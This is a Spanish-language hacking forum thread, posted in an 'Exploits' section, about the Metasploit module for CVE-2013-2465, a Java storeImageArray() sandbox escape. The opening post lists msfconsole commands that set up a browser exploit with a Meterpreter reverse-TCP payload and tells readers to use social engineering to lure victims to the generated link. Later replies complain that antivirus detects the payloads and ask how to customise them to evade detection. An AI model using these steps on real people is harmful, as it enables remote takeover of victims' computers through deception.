Imagen


CVE-2013-2465 - Java storeImageArray() Invalid Array Indexing


Este módulo de Metasploit abusa de la vulneravilidad matriz indexación no válida en la función storeImageArray() de la función estática para producir una corrupción de memoria y finalmente evadir el Sandbox de Java. La vulnerabilidad afecta a Java versión 7u21 y versiones anteriores.

Imagen


Explotando CVE-2013-2465 con mestasploit:

// Cargamos el módulo

Código: Seleccionar todo

msf > use exploit/multi/browser/java_storeimagearray

msf exploit(java_storeimagearray) > set PAYLOAD java/meterpreter/reverse_tcp

msf exploit(java_storeimagearray) > set LHOST [IP Local]

msf exploit(java_storeimagearray) > set srvhost [IP Local]

msf exploit(java_storeimagearray) > set uripath /

msf exploit(java_storeimagearray) > exploit
Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.

Saludos, \0/
Twitter: @Stuxnetr00t
Nunca se acabarán las vulns de java JAJAJAJ. Creo que cualquiera con un poco de sentido común tiene deshabilitado java en su navegador xD

Saludos Stuxnet
Soy un camaleón, en tu cama, leona ♪
YYYYY payload detectada , siempre estamos en las mismas,sale un exploit ,usar metasploit para usarlo y las
payloads SIGUEN detectadas , por mucho que las pases por msfvenom(que no se puede en hot)
Y probablemente seguiremos así años , hasta que nos digan como customizar payloads
EDIT :Googleé y de esta vuln no hay source java , si alguien lo encuentra me avise por mp ,se lo agradeceré xD
RapidShare.de will permanently shut down the servers on 1. March 2010! nein ..
PD:Policia española psicópata
∩____∩
| (• ◡•)|
$DoC escribió:Nunca se acabarán las vulns de java JAJAJAJ. Creo que cualquiera con un poco de sentido común tiene deshabilitado java en su navegador xD

Saludos Stuxnet
+1
Process.Start("http://www.wabisorsoftware.com")

Mostrar/Ocultar

atheros14 escribió:
$DoC escribió:Nunca se acabarán las vulns de java JAJAJAJ. Creo que cualquiera con un poco de sentido común tiene deshabilitado java en su navegador xD

Saludos Stuxnet
+1

Pues hasta el momento ya las detuvieron XD hasta ya se habían tardado. No dejan ejecutar ningun applet sin firmar. y pronto deberan tener firma digital en el archivo manifest.
adwind escribió:
atheros14 escribió:
$DoC escribió:Nunca se acabarán las vulns de java JAJAJAJ. Creo que cualquiera con un poco de sentido común tiene deshabilitado java en su navegador xD

Saludos Stuxnet
+1

Pues hasta el momento ya las detuvieron XD hasta ya se habían tardado. No dejan ejecutar ningun applet sin firmar. y pronto deberan tener firma digital en el archivo manifest.
No amigo mio, java tiene aun mil 0days rulando por ahi, ya ni los navegadores lo quieren tener por defecto e incluso la gran mayoria de dristibuciones GNU/Linux estan empezando a quitarlo como instalado por defecto.

La firma digital y el manifest solo serán otra valla más en los 100 metros valla, a la minima que llegue alguien ágil, la salta y adios muy buenas.
sanko escribió:
adwind escribió:
atheros14 escribió:
$DoC escribió:Nunca se acabarán las vulns de java JAJAJAJ. Creo que cualquiera con un poco de sentido común tiene deshabilitado java en su navegador xD

Saludos Stuxnet
+1

Pues hasta el momento ya las detuvieron XD hasta ya se habían tardado. No dejan ejecutar ningun applet sin firmar. y pronto deberan tener firma digital en el archivo manifest.
No amigo mio, java tiene aun mil 0days rulando por ahi, ya ni los navegadores lo quieren tener por defecto e incluso la gran mayoria de dristibuciones GNU/Linux estan empezando a quitarlo como instalado por defecto.

La firma digital y el manifest solo serán otra valla más en los 100 metros valla, a la minima que llegue alguien ágil, la salta y adios muy buenas.
Responder

Volver a “Exploits”